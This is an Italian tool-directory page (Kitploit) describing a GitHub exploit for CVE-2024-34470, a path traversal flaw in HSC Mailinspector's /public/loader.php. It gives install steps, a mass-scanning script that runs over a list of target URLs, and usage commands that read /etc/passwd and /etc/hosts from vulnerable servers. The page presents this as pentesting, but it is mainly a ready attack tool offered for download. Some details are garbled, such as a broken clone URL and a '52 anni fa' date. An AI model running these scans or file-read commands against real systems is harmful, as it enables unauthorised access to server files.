Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-34470 — È stata trovata una vulnerabilità critica in HSC Mailinspector fino alla versione 5.2.18. Questa vulnerabilità interessa una funzionalità sconosciuta del file /public/loader.php. | Kitploit
Strumenti/GitHubGitHub/mr-r00t11/cve-2024-34470
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubmr-r00t11/cve-2024-34470

CVE-2024-34470

È stata trovata una vulnerabilità critica in HSC Mailinspector fino alla versione 5.2.18. Questa vulnerabilità interessa una funzionalità sconosciuta del file /public/loader.php.

Vedi Repository
52 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

HSC MailInspector - CVE-2024-34470


Una vulnerabilità critica è stata trovata in HSC Mailinspector fino alla versione 5.2.18. Questa vulnerabilità interessa una funzionalità sconosciuta del file /public/loader.php. La manipolazione dell'argomento 'path' con un input sconosciuto porta a una vulnerabilità di path traversal. Secondo CWE, questo problema è classificato come CWE-22. Il prodotto utilizza input esterni per costruire un percorso destinato a identificare un file o una directory situati all'interno di una directory padre ristretta, ma non neutralizza correttamente gli elementi speciali all'interno del percorso che possono far sì che il percorso risolva a una posizione al di fuori della directory ristretta. Questo compromette riservatezza, integrità e disponibilità.


Installazione

Clona il repository:

root@kitploit:~
git clone https://CVE-2024-34470.git
cd CVE-2024-34470

Installa le dipendenze

Assicurati di avere Python e pip installati. Quindi, esegui:

root@kitploit:~
pip install -r requirements.txt
  • Questo installerà tutte le dipendenze necessarie per eseguire lo script.

Utilizzo

Descrizione dello script

Per effettuare una ricerca su più target utilizzando un file di testo, usa lo script Massive_CVE-2024-34470.py

root@kitploit:~
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null

Il formato in cui il file urls.txt deve essere è il seguente:

root@kitploit:~
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443

[Screenshot_1.png]


Una volta identificati i target vulnerabili, usiamo lo script chiamato CVE-2024-34470.py per sfruttare e visualizzare il contenuto specificato tramite il terminale.

root@kitploit:~
# Read file content passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null

# Read file content hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts

[screenshot_2.png]

Scarica lo strumento